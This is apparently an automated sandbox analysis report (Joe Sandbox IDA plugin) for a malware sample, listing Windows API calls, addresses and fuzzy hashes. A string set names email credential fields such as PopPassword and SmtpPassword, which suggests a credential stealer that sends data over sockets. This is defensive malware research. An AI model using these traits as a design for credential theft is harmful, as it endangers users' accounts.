                                      • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser_wmemset
                                    • String ID: CA
                                    • API String ID: 2078537776-1052703068
                                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                    APIs
                                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InformationToken
                                    • String ID: IDA
                                    • API String ID: 4114910276-365204570
                                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                    APIs
                                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc
                                    • String ID: s1@
                                    • API String ID: 190572456-427247929
                                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                    APIs
                                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 1425999871-0
                                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                    APIs
                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CheckMembershipToken
                                    • String ID:
                                    • API String ID: 1351025785-0
                                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                    APIs
                                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateDirectory
                                    • String ID:
                                    • API String ID: 4241100979-0
                                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoNativeSystem
                                    • String ID:
                                    • API String ID: 1721193555-0
                                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                    APIs
                                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                    APIs
                                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileMove
                                    • String ID:
                                    • API String ID: 3562171763-0
                                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                    APIs
                                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startup
                                    • String ID:
                                    • API String ID: 724789610-0
                                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                    APIs
                                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                    APIs
                                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Open
                                    • String ID:
                                    • API String ID: 71445658-0
                                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                    APIs
                                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                    APIs
                                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFind
                                    • String ID:
                                    • API String ID: 1863332320-0
                                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                    APIs
                                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                    APIs
                                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID:
                                    • API String ID: 1174141254-0
                                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                    APIs
                                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: closesocket
                                    • String ID:
                                    • API String ID: 2781271927-0
                                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                    APIs
                                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                    APIs
                                    • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                    APIs
                                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                    APIs
                                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                    APIs
                                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 0040438F
                                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                    • VariantInit.OLEAUT32(?), ref: 004043C4
                                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                                    • VariantInit.OLEAUT32(?), ref: 00404414
                                    • SysAllocString.OLEAUT32(?), ref: 00404419
                                    • VariantInit.OLEAUT32(?), ref: 00404431
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                                    • String ID:
                                    • API String ID: 1312198159-0
                                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                    • API String ID: 0-2111798378
                                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
